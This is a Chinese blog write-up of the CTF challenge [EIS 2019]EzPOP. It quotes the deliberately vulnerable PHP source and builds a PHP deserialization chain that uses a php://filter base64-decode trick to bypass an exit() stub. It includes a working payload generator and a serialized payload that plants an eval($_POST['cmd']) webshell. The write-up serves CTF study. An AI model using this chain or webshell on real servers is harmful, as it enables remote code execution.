[EIS 2019]EzPOP

最新推荐文章于 2023-03-31 01:48:05 发布
最新推荐文章于 2023-03-31 01:48:05 发布
阅读量1.4k 收藏 3
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43801002/article/details/106137534
版权

#题目:

 <?php
error_reporting(0);

class A{
    protected $store;
    protected $key;
    protected $expire;
    public function __construct($store, $key = 'flysystem', $expire = null)
    {
        $this->key    = $key;
        $this->store  = $store;
        $this->expire = $expire;
    }

    public function cleanContents(array $contents)
    {
        $cachedProperties = array_flip([
            'path', 'dirname', 'basename', 'extension', 'filename',
            'size', 'mimetype', 'visibility', 'timestamp', 'type',
        ]);

        foreach ($contents as $path => $object) {
            if (is_array($object)) {
                $contents[$path] = array_intersect_key($object, $cachedProperties);
            }
        }

        return $contents;
    }

    public function getForStorage()
    {
        $cleaned = $this->cleanContents($this->cache);

        return json_encode([$cleaned, $this->complete]);
    }

    public function save()
    {
        $contents = $this->getForStorage();

        $this->store->set($this->key, $contents, $this->expire);
    }

    public function __destruct()
    {
        if (! $this->autosave) {
            $this->save();
        }
    }
}

class B{
    protected function getExpireTime($expire): int
    {
        return (int) $expire;
    }

    public function getCacheKey(string $name): string
    {
        return $this->options['prefix'] . $name;
    }

    protected function serialize($data): string
    {
        if (is_numeric($data)) {
            return (string) $data;
        }
        $serialize = $this->options['serialize'];
        return $serialize($data);
    }

    public function set($name, $value, $expire = null): bool
    {
        $this->writeTimes++;
        if (is_null($expire)) {
            $expire = $this->options['expire'];
        }
        $expire   = $this->getExpireTime($expire);
        $filename = $this->getCacheKey($name);
        $dir = dirname($filename);
        if (!is_dir($dir)) {
            try {
                mkdir($dir, 0755, true);
            } catch (\Exception $e) {
                // 创建失败
            }
        }
        $data = $this->serialize($value);
        if ($this->options['data_compress'] && function_exists('gzcompress')) {
            //数据压缩
            $data = gzcompress($data, 3);
        }

        $data   = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
        $result = file_put_contents($filename, $data);

        if ($result) {
            return true;
        }
        return false;
    }
}

if (isset($_GET['src']))
{
    highlight_file(__FILE__);
}

$dir = "uploads/";

if (!is_dir($dir))
{
    mkdir($dir);
}
unserialize($_GET["data"]);

依然是反序列化,两个类。
先看A类。
__construct方法

  public function __construct($store, $key = 'flysystem', $expire = null)
    {
        $this->key    = $key;
        $this->store  = $store;
        $this->expire = $expire;
    }

接收三个参数并赋值。魔法函数,在new一个对象的时候自动调用。

cleanContents方法

  public function cleanContents(array $contents)
    {
        $cachedProperties = array_flip([
            'path', 'dirname', 'basename', 'extension', 'filename',
            'size', 'mimetype', 'visibility', 'timestamp', 'type',
        ]);

        foreach ($contents as $path => $object) {
            if (is_array($object)) {
                $contents[$path] = array_intersect_key($object, $cachedProperties);
            }
        }

        return $contents;
    }

array_intersect_key()函数用于比较两个(或更多个)数组的键名 ,并返回交集。
第一段是数组赋值,第二段数组遍历并将两个数组的交际赋给$contents[$path]
所以我们$object的键选$cachedProperties中任意一个都行,这里选择path。值就是我们的shell的url后的base64编码,
image.png

JTNDJTNGcGhwJTIwZXZhbCUyOCUyNF9HRVQlNUIlMjd6eiUyNyU1RCUyOSUzQiUzRiUzRQ==
所以
$object=array("path"=>"JTNDJTNGcGhwJTIwZXZhbCUyOCUyNF9HRVQlNUIlMjd6eiUyNyU1RCUyOSUzQiUzRiUzRQ==");

下面看B类
getCacheKey方法
prefix用于文件名构造

    public function getCacheKey(string $name): string
    {
        return $this->options['prefix'] . $name;
    }

$filename = $this->getCacheKey($name);

因为在后面写入文件的时候,前面拼接了一段别的php代码,而且这段代码会导致即便我们在后面拼接上shell也无法正常执行。

"<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n"

$data   = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
$result = file_put_contents($filename, $data);

这段代码中的$data全部用base64解码转化过后再写入文件中,其中前面拼接部分会被强制解码,从而变成一堆乱码。而我们写入的shell(base64编码过的)会解码成正常的木马文件。
这里唯一需要注意的是长度问题,我们需要shell部分<?php phpinfo()?>前面加起来的字节数为4的倍数(base64解码时不影响shell部分)。
所以$b->options['prefix']='php://filter/write=convert.base64-decode/resource=./uploads/';已经可以确定了。

现在只需要控制写入内容
$date接收传参

$data   = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;

最终payload

<?php
class A{
    protected $store;
    protected $key;
    protected $expire;
    public function __construct()
    {
        $this->key = 'pz.php';
    }
    public function start($tmp){
        $this->store = $tmp;
    }
}
class B{
    public $options;
}

$a = new A();
$b = new B();
$b->options['prefix'] = "php://filter/write=convert.base64-decode/resource=";
$b->options['expire'] = 11;
$b->options['data_compress'] = false;
$b->options['serialize'] = 'strval';
$a->start($b);
$object = array("path"=>"PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg");
$path = '111';
$a->cache = array($path=>$object);
$a->complete = '2';
echo urlencode(serialize($a));
?>

PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs/Pg base64解码后为<?php eval($_POST['cmd']);?>
,payload运行后,date为

O%3A1%3A%22A%22%3A5%3A%7Bs%3A8%3A%22%00%2A%00store%22%3BO%3A1%3A%22B%22%3A1%3A%7Bs%3A7%3A%22options%22%3Ba%3A4%3A%7Bs%3A6%3A%22prefix%22%3Bs%3A50%3A%22php%3A%2F%2Ffilter%2Fwrite%3Dconvert.base64-decode%2Fresource%3D%22%3Bs%3A6%3A%22expire%22%3Bi%3A11%3Bs%3A13%3A%22data_compress%22%3Bb%3A0%3Bs%3A9%3A%22serialize%22%3Bs%3A6%3A%22strval%22%3B%7D%7Ds%3A6%3A%22%00%2A%00key%22%3Bs%3A6%3A%22pz.php%22%3Bs%3A9%3A%22%00%2A%00expire%22%3BN%3Bs%3A5%3A%22cache%22%3Ba%3A1%3A%7Bi%3A111%3Ba%3A1%3A%7Bs%3A4%3A%22path%22%3Bs%3A38%3A%22PD9waHAgZXZhbCgkX1BPU1RbJ2NtZCddKTs%2FPg%22%3B%7D%7Ds%3A8%3A%22complete%22%3Bs%3A1%3A%222%22%3B%7D

让?src=&data=payload
image.png

浩歌已行
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
EIS电路拟合AZSimDemo
06-07
EIS电路拟合AZSimDemo,非常好用,
ESET EIS 64位安装包
01-07
ESET EIS 64位版本离线安装包,安装包下载于2019-1-7日,需要准备序列号
EIS2019-EzPOP
ro4lsc的博客
05-14 1394
做了这个题目,我收回我之前的话,我又懵逼了,不知道如何下手,还是自己的基础不够扎实,没关系,奥利给,淦!
[EIS 2019]EzPOP 完整题解
qq_38338511的博客
03-31 238
这样就可以把我们传进去的$data进行解码了,上面做了演示用base64加密后再解密的一句话马儿可以忽略json_encode输出我们想要的值,这里就不能用上次的UCS-2编码和str_rot13编码方式了,因为有json_encode会乱码,学会本地测试活学活用!把$key传入了B类的set()方法的$name->最终传入了B类的set()方法的$filename。把$contents返回到了save()的$value->最终传入了B类的set()方法的$data。接着看进入B类的set()方法。
[EIS 2019]EzPOP 代码审查
qq_54929891的博客
05-08 363
源码 <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flag.php', $expire = null) { $this->key = $key; $this->store = $store;
[BUUCTF][EIS 2019]EzPOP
cosmoslin的博客
02-07 358
[EIS 2019]EzPOP <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this->key = $key; $this->store
eis
04-01
埃斯
eis.rar_eis_eis group 如何?
09-24
Discuz!模板 适用版本: Discuz! X2 语言编码: GBK简体 风格转换者: 原创 ...离开的人怀念这里的热干面,精武鸭,还有这里的人和事,Eis_010城市空间Discuz!X2.0模板发布,想想你怀念的是哪座城市呢?
EIS_PANKAJ
03-21
EIS_PANKAJ
国赛ezpop题目复现(tp6)
m0_62422842的博客
07-21 635
顺着这个题目,也抛砖引玉一下,对thinkphp6.0.12框架的反序列化链进行了一个分析。
[MRCTF2020]Ezpop
qq_43801002的博客
05-14 669
题目: Welcome to index.php <?php //flag is in flag.php //WTF IS THIS? //Learn From https://ctf.ieki.xyz/library/php.html#%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E9%AD%94%E6%9C%AF%E6%96%B9%E6%B3%95 //And Crack It! class Modifier { protected $var; pub
MRCTF2020 web Ezpop_Revenge 简单记录
a3320315的博客
03-31 2998
题目介绍 首先这是一个typecho的框架 然后通过扫目录得到www.zip源码泄露,然后就是审计代码了~~ 解题过程 首先我们找到输入点 在插件中,我们发现action()的代码 这儿需要说明一下,这儿的action一般是自动加载的,当路由加载类是会自动加载某个函数,所以我们直接搜索这个类得名称~~ Helper::addRoute("page_admin_action","/page_a...
Thinkphp cache缓存函数远程代码执行漏洞
feng的博客
03-10 1818
前言 环境创建: composer create-project topthink/think=5.0.10 thinkphp5.0.10 "require": { "php": ">=5.4.0", "topthink/framework": "5.0.10" }, composer update 影响版本:3.2.3-5.0.10 index控制器里写个cache()函数: public function cache() {
Thinkphp5.0 反序列化漏洞复现
feng的博客
03-11 2014
前言 环境创建: composer create-project topthink/think=5.0.14 thinkphp5.0.14 "require": { "php": ">=5.4.0", "topthink/framework": "5.0.14" }, composer update
php写入缓存有什么用,PHP 做数据缓存时遇到一个不停写入缓存的问题,该怎么解决?...
weixin_39939530的博客
03-10 159
849 天前TP5.1 的```/*** 读取缓存* @access public* @param string $name 缓存变量名* @param mixed $default 默认值* @return mixed*/public function get($name, $default = false){$this->readTimes++;$filename = $this-&gt...
ThinkPhp3.2.3缓存漏洞复现以及修复建议
飞鱼计划
04-18 9736
ThinkPhp3.2.3缓存漏洞复现以及修复建议 今天早上无意间看到thinkphp的缓存漏洞,小编在实际开发过程中用thinkphp3.2.3挺多的。 漏洞原文链接:https://xianzhi.aliyun.com/forum/read/1973.html有兴趣的小伙伴可以去详细的学习一下 我们这里来复现一下漏洞 后面我会提出修复建议 首先我们下载最新的thinkphp...
eis spectrum analyzer
最新发布
11-29
EIS谱分析仪是一种用于分析电化学阻抗谱的仪器。EIS代表电化学阻抗谱,它测量电化学系统中的电流和电压响应,以了解系统的电化学特性和界面的行为。 EIS谱分析仪是通过施加幅度和频率变化的正弦交流电信号来进行测量的。信号通常在一定的频率范围内进行变化,从低频到高频。通过测量系统的电流和电压响应,可以得到复阻抗的频率响应。根据这些响应,可以计算出电化学系统的电阻、电容和极化等参数。 EIS谱分析仪广泛应用于电化学研究和工业应用中。在研究方面,EIS谱分析仪可以帮助研究人员深入了解电化学反应的动力学特性、电极材料的性质以及电解液的行为。在工业应用方面,EIS谱分析仪可用于电化学腐蚀、材料保护和电池测试等领域。通过分析电阻、电容和极化等参数,可以评估和优化电化学系统的性能。 总之,EIS谱分析仪是一种重要的工具,可以实时监测电化学系统的变化,并提供有关系统特性的有用信息。该仪器广泛应用于电化学研究和工业领域,对于理解和优化电化学过程具有重要意义。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值